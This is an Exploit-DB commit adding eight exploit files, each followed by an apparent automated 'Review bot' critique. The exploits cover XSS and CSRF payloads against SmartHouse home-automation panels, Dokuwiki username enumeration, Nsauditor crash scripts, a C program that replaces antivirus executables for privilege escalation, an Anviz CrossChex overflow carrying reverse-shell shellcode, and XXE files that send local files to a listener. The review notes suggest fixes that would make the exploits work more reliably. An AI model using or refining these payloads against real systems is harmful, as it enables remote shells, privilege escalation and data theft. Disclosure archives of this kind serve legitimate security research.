DB: 2019-12-03

8 changes to exploits/shellcodes

Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC)
Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC)
Visual Studio 2008 - XML External Entity Injection
Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions
Anviz CrossChex 4.3.12 - Local Buffer Overflow
Microsoft Excel 2016 1901 - XML External Entity Injection
SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery
Dokuwiki 2018-04-22b - Username Enumeration
Offensive Security 2019-12-03 05:01:42 +00:00
parent 8ae8522082
commit 0f56f2f38c
9 changed files with 718 additions and 0 deletions


@ -0,0 +1,123 @@
# Exploit Title: SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery
# Discovery by: LiquidWorm
# Date: 2019-12-02
# Vendor Homepage: http://www.gavazzi-automation.com
# Tested Version: 6.5.33.17072501
# CVE: N/A
# Advisory ID: ZSL-2019-5543
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php
Carlo Gavazzi SmartHouse Webapp 6.5.33 CSRF/XSS Vulnerabilities
Vendor: Carlo Gavazzi Automation S.p.A
Product web page: http://www.gavazzi-automation.com | http://www.smarthouse.nu
Affected version: Web-app: 6.5.33.17072501
Web-app: 6.5.32.17062101
Web-app: 6.2.3.16102701
Web-app: 5.5.3.160421101
Web-app: 5.3.3.15120101
Release: 1.0.5.1
Release: 1.0.5.0
Release: 1.0.3.5
Release: 1.0.3.2
Summary: Carlo Gavazzi is an international company that develops, manufactures
and sells electrical automation components. Our products are used in industrial
automation and real estate automation. Smart-house is based on a system that we
have developed and produced since 1986, mainly for industrial-related installations.
Our system is present in more than 150,000 installations. For a few years now, we
have focused our development on smart electrical installations for home and property
automation. Smart-house is currently installed in both villas and commercial properties.
Desc: The application suffers from multiple CSRF and XSS vulnerabilities. The application
allows users to perform certain actions via HTTP requests without performing any validity
checks to verify the requests. This can be exploited to perform certain actions with
administrative privileges if a logged-in user visits a malicious web site. Input passed
to several GET/POST parameters is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session
in context of an affected site.
Tested on: Apache
PHP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5543
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php
01.11.2019
--
Reflected XSS (GET):
--------------------
1. http://192.168.0.24/app/index.php?error=Waddup"><script>confirm(document.cookie)</script> (pre-auth)
2. http://192.168.0.24/app/messagepage.php?msg=<script>confirm(document.cookie)</script> (pre-auth)
3. http://192.168.0.24/app/detaf.php?p=0&l=50"><script>confirm(document.cookie)</script>&f=5658 (post-auth)
4. http://192.168.0.24/app/detaf.php?p=0"><script>confirm(document.cookie)</script>&l=50&f=5658 (post-auth)
5. http://192.168.0.24/?functionsh=list&part[]=fn__intrudermain001&part[]=fn__intrudersec002&name=IntruderMainFunction"><script>confirm(document.cookie)</script>&grpl=1 (post-auth)
CSRF set temperature:
---------------------
<html>
<body>
<form action="http://192.168.0.24/app/datasend.php" method="POST">
<input type="hidden" name="IDFunction" value="3875" />
<input type="hidden" name="favorite" value="0" />
<input type="hidden" name="rooms" value="-1" />
<input type="hidden" name="userId" value="-300" />
<input type="hidden" name="heat_ensave_set" value="24" />
<input type="hidden" name="heat_set" value="25.5" />
<input type="submit" value="Set" />
</form>
</body>
</html>
Stored XSS (POST):
------------------
<html>
<body>
<form action="http://192.168.0.24/app/command.php" method="POST">
<input type="hidden" name="op" value="11" />
<input type="hidden" name="name" value='Graph name"><script>confirm(document.cookie)</script>' />
<input type="hidden" name="period" value="2" />
<input type="hidden" name="gg" value="6" />
<input type="hidden" name="ggf" value="6" />
<input type="hidden" name="mm" value="11" />
<input type="hidden" name="mmf" value="11" />
<input type="hidden" name="aa" value="2019" />
<input type="hidden" name="aaf" value="2019" />
<input type="hidden" name="param" value="[1]" />
<input type="submit" value="Send" />
</form>
</body>
</html>
Reflected XSS (POST):
---------------------
<html>
<body>
<form action="http://192.168.0.24/refresh.php">
<input type="hidden" name="param[0][]" value="switch0251<script>confirm(document.cookie)</script>" />
<input type="hidden" name="param[0][]" value="0251" />
<input type="hidden" name="param[0][]" value="switch" />
<input type="hidden" name="param[1][]" value="switch1250" />
<input type="hidden" name="param[1][]" value="1250" />
<input type="hidden" name="param[1][]" value="switch" />
<input type="submit" value="Send" />
</form>
</body>
</html>
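Review bot: the third form, under the 'Reflected XSS (POST)' heading, has no method="POST" (it reads only <form action="http://192.168.0.24/refresh.php">), so a browser submits it as a GET request, which contradicts the heading and differs from the two forms above it; add method="POST" or retitle the section. Two smaller points: the IDFunction, userId and param values (3875, -300, [1]) are specific to the tested installation and should be flagged as values an attacker has to discover first, and the '# Exploit Title' line says only 'Cross-Site Request Forgery' while the body documents five reflected XSS sinks (two of them pre-auth) plus a stored one, so the title under-describes what the file contains.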


@ -0,0 +1,37 @@
# Exploit Title: Dokuwiki 2018-04-22b - Username Enumeration
# Date: 2019-12-01
# Exploit Author: Talha ŞEN
# Vendor Homepage: https://www.dokuwiki.org/dokuwiki
# Software Link: https://download.dokuwiki.org/
# Version: 2018-04-22b "Greebo"
# Tested on:
# Alpine Linux 3.5 (docker image)
# PHP 5.6.30
# Apache/2.4.25 (Unix)
# CVE :
# At login page there is a "set new password" page as below:
# Forgotten your password? Get a new one: Set new password
# At this page there is username enumeration vulnerability.
# Testing for non-valid user:
POST /doku.php?id=start&do=resendpwd HTTP/1.1
sectok=&do=resendpwd&save=1&login=sss
# Response for non-valid user(sss):
<div class="error">Sorry, we can't find this user in our database.</div>
========================================================================
# Testing for valid user:
POST /doku.php?id=start&do=resendpwd HTTP/1.1
sectok=&do=resendpwd&save=1&login=admin
# Response for valid user (admin):
<div class="error">There was an unexpected problem communicating with SMTP: Could not open SMTP Port.</div>
<div class="error">Looks like there was an error on sending the password mail. Please contact the admin!</div>
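Review bot: the two PoC requests are not replayable as written, because each shows only the request line and the body (POST /doku.php?id=start&do=resendpwd HTTP/1.1 followed directly by sectok=&do=resendpwd&save=1&login=sss) with no Host header, no Content-Type: application/x-www-form-urlencoded and no blank line separating headers from body; add those so the request can be pasted into a proxy or curl. The file should also say which part of the response is the oracle (presence or absence of 'Sorry, we can't find this user in our database.') rather than relying on the 'Could not open SMTP Port' text, which only appears on an installation whose mail delivery is broken. The empty '# CVE :' field should be filled or removed, and '# Date: 2019-12-01' disagrees with the 2019-12-02 recorded for this entry in files.csv.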

exploits/windows/dos/47728.py Executable file

@ -0,0 +1,35 @@
# Exploit Title: Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC)
# Discovery by: SajjadBnd
# Date: 2019-11-30
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Tested Version: 3.1.8.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 - Pro
# About App
# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks and hosts for vulnerabilities,
# and to provide security alerts.Nsauditor network auditor checks enterprise network for all potential methods that
# a hacker might use to attack it and create a report of potential problems that were found , Nsauditor network auditing
# software significantly reduces the total cost of network management in enterprise environments by enabling
# IT personnel and systems administrators gather a wide range of information from all the computers in the network without
# installing server-side applications on these computers and create a report of potential problems that were found.
# PoC
# 1.Run the python script, it will create a new file "dos.txt"
# 3.Run Nsauditor and click on "Register -> Enter Registration Code"
# 2.Paste the content of dos.txt into the Field: 'Name'
# 6.click 'ok'
# 5.Crashed ;)
#!/usr/bin/env python
buffer = "\x41" * 1000
try:
f=open("dos.txt","w")
print "[+] Creating %s bytes DOS payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
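Review bot: the PoC steps are numbered 1, 3, 2, 6, 5 and are out of order; renumber them 1 through 5 in the sequence they are meant to be followed (run the script, start Nsauditor, open Register -> Enter Registration Code, paste dos.txt into 'Name', click OK). The shebang '#!/usr/bin/env python' sits after the comment block instead of on line 1, so it has no effect, and the script uses Python 2 print statements (print "[+] Creating %s bytes DOS payload.." %len(buffer)), so either label it as Python 2 or port the prints to print(...). The bare 'except:' hides the actual reason a file could not be created; catch IOError/OSError and print the exception. A line describing what was observed ('Crashed ;)' does not say whether the process raised an exception, hung, or which module faulted) would make this a stronger DoS PoC than the 1000-byte input alone.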

exploits/windows/dos/47732.py Executable file

@ -0,0 +1,37 @@
# Exploit Title: Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC)
# Discovery by: SajjadBnd
# Date: 2019-11-30
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Tested Version: 3.1.8.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 - Pro
# Email : blackwolf@post.com
# About App
# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks
# and hosts for vulnerabilities, and to provide security alerts.Nsauditor network auditor checks enterprise
# network for all potential methods that a hacker might use to attack it and create a report of potential
# problems that were found , Nsauditor network auditing software significantly reduces the total cost of
# network management in enterprise environments by enabling IT personnel and systems administrators gather
# a wide range of information from all the computers in the network without installing server-side applications
# on these computers and create a report of potential problems that were found.
# POC
# 1.Run the python script, it will create a new file "dos.txt"
# 3.Run Nsauditor and click on "Register -> Enter Registration Code"
# 2.Paste the content of dos.txt into the Field: 'Key'
# 6.click 'ok'
# 5.Crashed ;)
#!/usr/bin/env python
buffer = "\x41" * 1000
try:
f=open("dos.txt","w")
print "[+] Creating %s bytes DOS payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
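Review bot: this file is the same script as 47728.py in this commit, differing only in the step text 'Paste the content of dos.txt into the Field: 'Key'' and the added 'Email :' line, so every defect noted there applies here as well: steps numbered 1, 3, 2, 6, 5; shebang not on the first line; Python 2 print statements; bare except. Consider one script whose steps list both the 'Name' and 'Key' fields, or at least a cross-reference between the two entries. The 'Email : blackwolf@post.com' line is personal data that the other files in this commit do not carry; confirm it was intended for publication.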


@ -0,0 +1,133 @@
# Exploit Title: Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions
# Discovery by: hyp3rlinx
# Date: 2019-12-02
# Vendor Homepage: www.maxpcsecure.com
# Tested Version: 19.0.4.020
# CVE: N/A
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MAX-SECURE-PLUS-ANTIVIRUS-INSECURE-PERMISSIONS.txt
[+] ISR: ApparitionSec
[Vendor]
www.maxpcsecure.com
[Affected Product Code Base]
Max Secure Anti Virus Plus - 19.0.4.020
File hash: ab1dda23ad3955eb18fdb75f3cbc308a
msplusx64.exe
[Vulnerability Type]
Insecure Permissions
[CVE Reference]
N/A
[Security Issue]
Max Secure Anti Virus Plus 19.0.4.020 has Insecure Permissions on the installation directory.
Local attackers or malware running at low integrity can replace a .exe or .dll file to achieve privilege escalation.
C:\Program Files\Max Secure Anti Virus Plus>cacls * | more
C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F
BUILTIN\Users:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
[Affected Component]
Permissions on installation directory
[Exploit/POC]
#include <stdio.h>
#include <windows.h>
#define TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxSDUI.exe"
#define TMP "C:\\Program Files\\Max Secure Anti Virus Plus\\2.exe"
#define DISABLED_TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\666.tmp"
/* Max Secure Anti Virus Plus PoC By hyp3rlinx */
BOOL PWNED=FALSE;
BOOL FileExists(LPCTSTR szPath){
DWORD dwAttrib = GetFileAttributes(szPath);
return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
}
void main(void){
if(!FileExists(DISABLED_TARGET)){
CopyFile(TARGET, TMP, FALSE);
Sleep(1000);
CopyFile(TMP, DISABLED_TARGET, FALSE);
printf("[+] Max Secure Anti Virus Plus EoP PoC\n");
Sleep(1000);
printf("[+] Disabled MaxSDUI.exe ...\n");
Sleep(300);
}else{
PWNED=TRUE;
}
if(!PWNED){
char fname[MAX_PATH];
char newLoc[]=TARGET;
DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
if (size){
printf("[+] Copying exploit to vuln dir...\n");
Sleep(1000);
CopyFile(fname, TARGET, FALSE);
printf("[+] Replaced legit Max Secure EXE...\n");
Sleep(2000);
printf("[+] Done!\n");
MoveFile(fname, "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxPwn.lnk");
Sleep(1000);
exit(0);
}
}else{
if(FileExists(TMP)){
remove(TMP);
}
printf("[+] Max Secure Anti Virus Plus PWNED!!!\n");
printf("[+] hyp3rlinx\n");
system("pause");
}
}
[POC Video URL]
https://www.youtube.com/watch?v=DXSV5geXkTw
[Network Access]
Local
[Severity]
High
[Disclosure Timeline]
Vendor Notification: November 19, 2019
Vendor: "received a reply they will fix soon"
Status request: November 24, 2019
No replies other than automated response.
November 29, 2019 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
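Review bot: none of the CopyFile calls in the PoC check their return value, so if the copy to TMP or the overwrite of TARGET fails (for example because MaxSDUI.exe is running and locked) the program still prints 'Replaced legit Max Secure EXE...' and 'Done!'; test each CopyFile result and print GetLastError on failure. 'void main(void)' is non-standard (use int main), 'char newLoc[]=TARGET;' is never used, and the MoveFile that renames the running exploit to 'MaxPwn.lnk' is not explained and does not create a shortcut. On the evidence side, the cacls output shows only 7z.dll with 'BUILTIN\Users:(ID)F', while the claim is about the whole installation directory; include the ACL of the directory itself and of MaxSDUI.exe, the file the PoC actually replaces. The statement that malware 'running at low integrity' can replace the files is stronger than what the DACL shows: mandatory integrity control still applies to a low-integrity writer regardless of the DACL, so state the precondition as any standard (medium-integrity) user, which is what the PoC exercises, unless a low-IL write was actually tested.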

exploits/windows/local/47734.py Executable file

@ -0,0 +1,125 @@
# Exploit Title: Anviz CrossChex 4.3.12 - Local Buffer Overflow
# Date: 2019-11-30
# Exploit Author: Luis Catarino & Pedro Rodrigues
# Vendor Homepage: https://www.anviz.com/
# Software Link: https://www.anviz.com/download.html
# Version: Crosschex Standard x86 <= V4.3.12
# Tested on: 4.3.8.0, 4.3.12
# CVE : N/A
# More info: https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html
import socket
import time
import sys
import binascii
# Scapy for the broadcast packet with custom sport
from scapy.all import Raw,IP,Dot1Q,UDP,Ether
import scapy.all
# shellcode working calc.exe
calculator_payload = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
calculator_payload += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
calculator_payload += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
calculator_payload += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
calculator_payload += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
calculator_payload += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
calculator_payload += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
calculator_payload += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
calculator_payload += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
calculator_payload += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
calculator_payload += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
calculator_payload += b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
calculator_payload += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
calculator_payload += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
calculator_payload += b"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"
# shellcode windows x86 reverse_shell
shell_payload_1 = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
shell_payload_1 += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
shell_payload_1 += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
shell_payload_1 += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
shell_payload_1 += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
shell_payload_1 += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
shell_payload_1 += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
shell_payload_1 += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
shell_payload_1 += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
shell_payload_1 += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
shell_payload_1 += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
shell_payload_1 += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
shell_payload_1 += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
shell_payload_1 += b"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
shell_payload_1 += b"\xdf\xe0\xff\xd5\x97\x6a\x05\x68"
# shellcode windows x86 reverse_shell (part_2)
shell_payload_2 = b"\x68\x02\x00\x01\xbd\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
shell_payload_2 += b"\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec"
shell_payload_2 += b"\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89"
shell_payload_2 += b"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66"
shell_payload_2 += b"\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44"
shell_payload_2 += b"\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68"
shell_payload_2 += b"\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"
shell_payload_2 += b"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68"
shell_payload_2 += b"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"
shell_payload_2 += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
def ipToShellcode(ip):
a = ip.split('.')
b = hex(int(a[0])) + hex(int(a[1])) + hex(int(a[2])) + hex(int(a[3]))
b = b.replace("0x","")
return binascii.unhexlify(b)
# sport has to be 5060
def sendFuzzingUDPBroadcast(ip="255.255.255.255", sport=5050, dport=5060):
request = b"A"*77 # Original payload substitute
request += b"B"*184
request += b"\x07\x18\x42\x00" # EIP - 00421807 crosscheck_standard.exe
request += b"A"*4
# 269 bytes
if len(sys.argv) > 2:
request = request + shell_payload_1 + ipToShellcode(sys.argv[2]) + shell_payload_2
else:
request = request + calculator_payload
scapy.all.sendp( Ether(src='00:00:00:00:00:00', dst="ff:ff:ff:ff:ff:ff")/IP(src=ip,dst='255.255.255.255')/UDP(sport=sport,dport=dport)/Raw(load=request), iface=sys.argv[1] )
def setFuzzUDPServer(ip='', port=5050, timeout=150):
try :
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print('[!] Failed to create server socket')
try:
s.bind(('', port))
except:
print('[*] Server socket bind failed')
sys.exit()
print('[*] Waiting for crosschex')
s.settimeout(timeout)
timeout = time.time() + timeout
responses = []
while True:
if time.time() > timeout:
break
try:
response = s.recvfrom(1024)
print(response)
responses.append(response)
sendFuzzingUDPBroadcast(ip=ip)
response = s.recvfrom(1024)
except socket.timeout:
print("[!] Error with UDP server")
s.close()
return responses
nargs = len(sys.argv)
if nargs < 2:
print("[*] Usage: python3 %s <network_interface> [<ip>]\n\tif you don't pass the ip of the LHOST it will drop a calculator, if you set the ip it will send a reverse shell to port 445")
sys.exit(0)
setFuzzUDPServer()
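Review bot: ipToShellcode builds the LHOST bytes by concatenating hex(int(octet)) and stripping '0x', which does not zero-pad, so any octet below 16 yields an odd-length or misaligned string and a wrong address (192.168.1.5 becomes 'c0a815', three bytes instead of four); use socket.inet_aton(ip) or struct.pack('>4B', *map(int, ip.split('.'))) instead. Other points: the comment '# sport has to be 5060' contradicts the signature sendFuzzingUDPBroadcast(ip="255.255.255.255", sport=5050, dport=5060) and the server that binds port 5050, so say which is right; when socket.socket fails the code prints and falls through to s.bind with s unbound; the second s.recvfrom after sending discards the reply and any non-timeout socket error escapes the except; Dot1Q is imported but unused; and the usage string contains '%s' with no formatting argument, so it prints '%s' literally instead of the script name. Because the payload is sent as a UDP broadcast on the attacker's interface, 'Local Buffer Overflow' in the title understates the reach: anyone on the same L2 segment can trigger it without credentials.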


@ -0,0 +1,113 @@
# Exploit Title: Visual Studio 2008 - XML External Entity Injection
# Discovery by: hyp3rlinx
# Date: 2019-12-02
# Vendor Homepage: www.microsoft.com
# Software Link: Visual Studio 2008 Express IDE
# Tested Version: 2008
# CVE: N/A
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-VISUAL-STUDIO-EXPRESS-2008-IDE-XML-EXTERNAL-ENTITY-0Day.txt
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Visual Studio 2008 Express IDE
vcsetup.exe
File hash: 62f764849e8fcdf8bfbc342685641304
Download: http://go.microsoft.com/?linkid=7729279
[Vulnerability Type]
XML External Entity Injection 0Day
[CVE Reference]
N/A
[Security Issue]
Visual Studio 2008 IDE suffers from XML External Entity injection. Attackers can leverage many file types, some being MASM related files like .asm or .lst.
By opening any one of the following file types listed below, it can allow remote attackers to steal files from the victims computer, sending them to the
remote attackers server.
Double click any of the following extensions and it will trigger the XXE vulnerability. Note, upon installation of the IDE the following file types get
associated with Visual Studio 2008 and are ALL vulnerable and will trigger the XXE exploit.
[Vuln XXE file types]
.snippet
.i
.s
.asm
.disco
.lst
.inc
.srf
.wsdl
.rgs
.xml
This IDE is pretty old, I know, but its still available for download as of this writing, therefore I release the advisory.
[References]
https://devblogs.microsoft.com/visualstudio/end-of-support-for-visual-studio-2008-in-one-year/
[Exploit/POC]
"Evil.snippet" or any of the extensions mentioned above.
<?xml version="1.0"?>
<!DOCTYPE knobgobslob [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
"payload.dtd"
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;
python -m SimpleHTTPServer
python -m http.server (Python3)
[POC Video URL]
https://www.youtube.com/watch?v=QOZlwzsbPrk
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: 3/24/2017
MSRC sent me link to "Definition of a Security Vulnerability"
Also Product is also not supported anymore.
December 1, 2019 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
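Review bot: the '[Network Access] Remote' field conflicts with how the entry is catalogued in files.csv (type local, platform xml) and with the PoC itself, in which the victim must open a crafted file and both SYSTEM entities point at 127.0.0.1:8000; say explicitly that in a real attack the DTD host and the exfiltration URL are the attacker's server and that user interaction is required. The claim that ALL of the listed extensions (.snippet, .i, .s, .asm, .disco, .lst, .inc, .srf, .wsdl, .rgs, .xml) trigger the XXE is supported only by 'Evil.snippet'; a statement that each was actually tested, at least for the non-XML ones such as .asm and .lst that make the finding surprising, would carry the claim. payload.dtd places the raw file contents into the query string ('http://127.0.0.1:8000?%file;'), which works for system.ini but may fail for files containing characters the parser rejects in a URL, so that limitation is worth a sentence. 'python -m SimpleHTTPServer' is Python 2 only, which the following line already covers.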


@ -0,0 +1,107 @@
# Exploit Title: Microsoft Excel 2016 1901 - XML External Entity Injection
# Discovery by: hyp3rlinx
# Date: 2019-12-02
# Vendor Homepage: www.microsoft.com
# Tested Version: 2016 v1901
# CVE: N/A
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EXCEL-2016-v1901-IMPORT-ERROR-EXTERNAL-ENTITY-INJECTION.txt
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Excel 2016 v1901
Microsoft Excel is a spreadsheet developed by Microsoft for Windows, macOS, Android and iOS.
It features calculation, graphing tools, pivot tables, and a macro programming language called Visual Basic for Applications.
[CVE]
N/A
[Vulnerability Type]
Error Import Based XML External Entity Injection
[Security Issue]
Excel query from file feature is vulnerable to "Error" based XML External Entity attacks, if the user chooses the "Import as
Html page" functionality upon receiving errors importing a specially crafted XML file.
This can result in potential remote data exfiltration, user interaction is required to exploit this vulnerability.
Tested successfuly Windows 10 .NET framework version v4.0.30319.
C:\>dir /b %windir%\Microsoft.NET\Framework\v*
v4.0.30319
[Exploit/POC]
Create a new ".xlsx" file then, go to Data tab and choose 'New Query/From File/From XML'
1) You will get error like:
"Error:
Unable to connect
We encountered an error while trying to connect.
The user will then get an option to 'Edit' where they can import the file as an HTML file
Result Local data can be exfiltrated to remote server"
2) Excel will then give you option to 'Edit' and import as 'Html Page' from the drop down menu in Excel
User has choose to import as HTML then XXE attack will succeed:
e.g.
127.0.0.1 - - [05/Mar/2019 15:31:16] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FO
/1.1" 200 -
Malicious XML file to load as New Data Query
"test.xml"
<?xml version='1.0'?>
<!DOCTYPE root [
<!ENTITY % file SYSTEM 'C:\Windows\system.ini'>
<!ENTITY % dtd SYSTEM 'http://127.0.0.1:8000/payload.dtd'>
%dtd;]>
<pwn>&send;</pwn>
[Network Access]
Local
[Severity]
Medium
[Disclosure Timeline]
Vendor Notification: May 10, 2019
MSRC: May 17, 2019 "case did not meet the bar for servicing as a Security Release.
Engineering Team may or may not fix in a future version of the release."
November 30, 2019 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
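Review bot: the PoC references payload.dtd ('http://127.0.0.1:8000/payload.dtd') but, unlike the Visual Studio advisory in this same commit, never shows its contents, so the entry cannot be reproduced on its own; include the DTD that defines the 'send' entity consumed by '<pwn>&send;</pwn>'. The reproduction text is also out of order: the block quoted after '1) You will get error like:' already contains the Edit step and the 'Result Local data can be exfiltrated to remote server' line, and then step 2 repeats the Edit / 'Html Page' instruction; one clean numbered list (create workbook, Data > New Query > From File > From XML, accept the error, Edit, import as Html Page, observe the GET on the listener) would read better. The quoted server log line from 05/Mar/2019 showing system.ini content in the query string is the right artifact, but the '.NET framework version v4.0.30319' line is not tied to anything in the PoC; explain why the .NET version matters or drop it. 'Tested successfuly' is a typo.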


@ -6614,6 +6614,8 @@ id,file,description,date,author,type,platform,port
47721,exploits/ios/dos/47721.py,"GHIA CamIP 1.2 for iOS - 'Password' Denial of Service (PoC)",2019-11-28,"Ivan Marmolejo",dos,ios,
47723,exploits/windows/dos/47723.py,"SpotAuditor 5.3.2 - 'Key' Denial of Service",2019-11-29,ZwX,dos,windows,
47727,exploits/windows/dos/47727.py,"SpotAuditor 5.3.2 - 'Name' Denial of Service",2019-11-29,ZwX,dos,windows,
47728,exploits/windows/dos/47728.py,"Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC)",2019-12-02,SajjadBnd,dos,windows,
47732,exploits/windows/dos/47732.py,"Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC)",2019-12-02,SajjadBnd,dos,windows,
